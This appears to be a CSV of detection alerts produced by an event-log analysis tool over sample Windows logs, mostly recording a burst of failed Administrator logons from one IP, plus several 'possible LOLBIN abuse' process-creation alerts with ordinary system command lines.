NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6wjflwqXyFzYTi0b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlsuCSajqGUYTBWL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xQDdrQQZ5xYBDiRi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JX5NMuwUsOZEp3zh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfrbGLqKGru8AE2a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 813natbodi6QauRW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KpfKxOZG3xSr5Yqm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fErWiEb0USDghXsB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fOWF6YnW8UEPlw41 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SNPXuHduatLFQc8W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 35rfur4MzKzwxCIn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VmAqzaZaeoSjcuh5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lKuCpuGcGmDOoewr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bz6SOAeTyqsBz6Oa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSURiEoC7dw0w0ru | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bDjwkaHT8lrFmn9X | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ayI129HgVWA5q4Sk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jT2yiuOJS8Fvf9SD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hpAO2UrjFd6Kxt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZkgGj9Fnqn3XwnBT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFXPYo0yzR7p8dNU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9j6MxN7PuM29Vlcq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w1CWIqoV6GzmmlRm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uiBfvnfTcIG4xJoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dED7HYntoE5D7XvG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pX1ztnCKiePrPbTT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u3XQcfMHJDsBtJDy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhRsRIS5tHKLv2oL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JmkLhptugDU2fDWp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2yk62yREbgDCj9pB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6JPvkmaAsJlwn9t3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lhciP1zM9njlRI3j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: duNDenwdo1oHVuoL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0ChBZOYkTm1SguA1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RU38tuiKC0weexmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jg0Hp4xtz0pAMhCz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5AorVNz5MgTeEvn2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8oJ6tVjBxlYyj5ej | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oEAEOi0TsSRVPlz4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: USfEwKkH8OUADVds | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y0jg1i6tDiInd10i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xv2jRzrgoP6lJdAJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LmuAXUwSkhR3tSRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zy4Fkpvcrlmp9AES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 51ipUXvrRh0CPH1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TB15XKzVJwIyjqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i1F6muFPBlPyHPbR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XNXwYS73RElHozUo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ft1MLPJISeq0bMsa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i8kbFOwQiCyRVMDV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ToPzuDEmXN1fjIcS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pKF1QKEuTXIGnrx2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fyHpo6pX8TEo6ttv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3uYqEt90yr8B3rK9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LKkrM0slVn0CKHw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyJ82cfaddnc8c6D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KJRw0S82SupmuS4Y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4lSo9BMWdcPLfLb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XreSLg472qhJw0R3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KIJcQJKLmnjrE2T9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlddo3GCTEIkFyi9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hxiZoB5mHR2tGUFM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fpEbpiox2Q3Qf8av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:54:20.959 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x438 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:55:28.022 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x338 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:55:39.187 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x658 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:48.712 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\8xpeyiyp.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xbf4 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:48.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ud-vxj7k.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x840 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.017 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gsxogihi.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x2f8 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\owummvtl.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xe48 | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.183 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xe8c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 02:43:49.891 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 